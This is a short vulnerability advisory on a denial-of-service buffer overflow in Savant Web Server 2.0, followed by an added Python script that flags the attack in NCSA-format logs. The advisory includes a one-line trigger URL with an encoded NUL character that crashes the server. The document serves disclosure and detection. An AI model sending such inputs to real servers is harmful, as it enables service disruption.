Vulnerability

    Savant Web Server

Affected

    Savant Web Server V2.0 WIN9X / NT / 2K

Description

    Savant provides support for most modern web features and technologies, including:

    - Common Gateway Interface (CGI) 1.0 and 1.1
    - HTTP 0.9, 1.0, and 1.1 including keep-alive ability
    - Comprehensive logging in the standard NCSA format
    - User and group management
    - Password protection
    - Server-side image maps
    - Support for over 40 file types, including MP3, RealAudio, and Microsoft Office files
    - XML, JavaScript, Java, and ActiveX, and more!

    UssrLabs found a local/remote buffer overflow. The buffer overflow is caused by a NULL character in the routine that parses the GET command. For example, in Internet Explorer enter the address:

    http://SavantServerIP/%00/

    The D.O.S. action is logged in C:\Savant\Logs\general.txt; the entry looks like this:

    Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279

Solution

    Nothing yet, but vendor has been contacted.
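
An added example, not part of the original advisory: a Python log check that parses NCSA-format entries like the one quoted above and flags a percent-encoded NUL in the request path or the default document name repeated in the path. The sample log lines, the 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# NCSA Common Log Format: host ident authuser [date] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
# The default document name appended three or more times in a row.
REPEATED_DOC = re.compile(r'(?:index\.html){3,}', re.IGNORECASE)

def inspect_line(line):
    """Return the reasons a log line is suspicious (empty list if none)."""
    m = CLF.match(line.strip())
    if not m:
        return ["unparseable"]
    # The request field is "METHOD target [version]"; the version may be absent.
    parts = m.group("request").split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    reasons = []
    # Decode percent-escapes to bytes so %00 becomes a literal NUL byte.
    if b"\x00" in unquote_to_bytes(target):
        reasons.append("encoded-nul-in-path")
    if REPEATED_DOC.search(target):
        reasons.append("repeated-default-document")
    return reasons

def scan(lines):
    """Return (host, reasons) for every line that raised at least one flag."""
    flagged = []
    for line in lines:
        reasons = inspect_line(line)
        if reasons:
            flagged.append((line.split(" ", 1)[0], reasons))
    return flagged

# Constructed sample entries (not taken from a real server log).
SAMPLE_LOG = [
    '192.0.2.7 - - [20/Dec/1999:00:09:58 -0300] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [20/Dec/1999:00:10:27 -0300] '
    '"GET /%00/index.htmlindex.htmlindex.htmlindex.html" 301 279',
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG):
        print(host, ", ".join(reasons))
```
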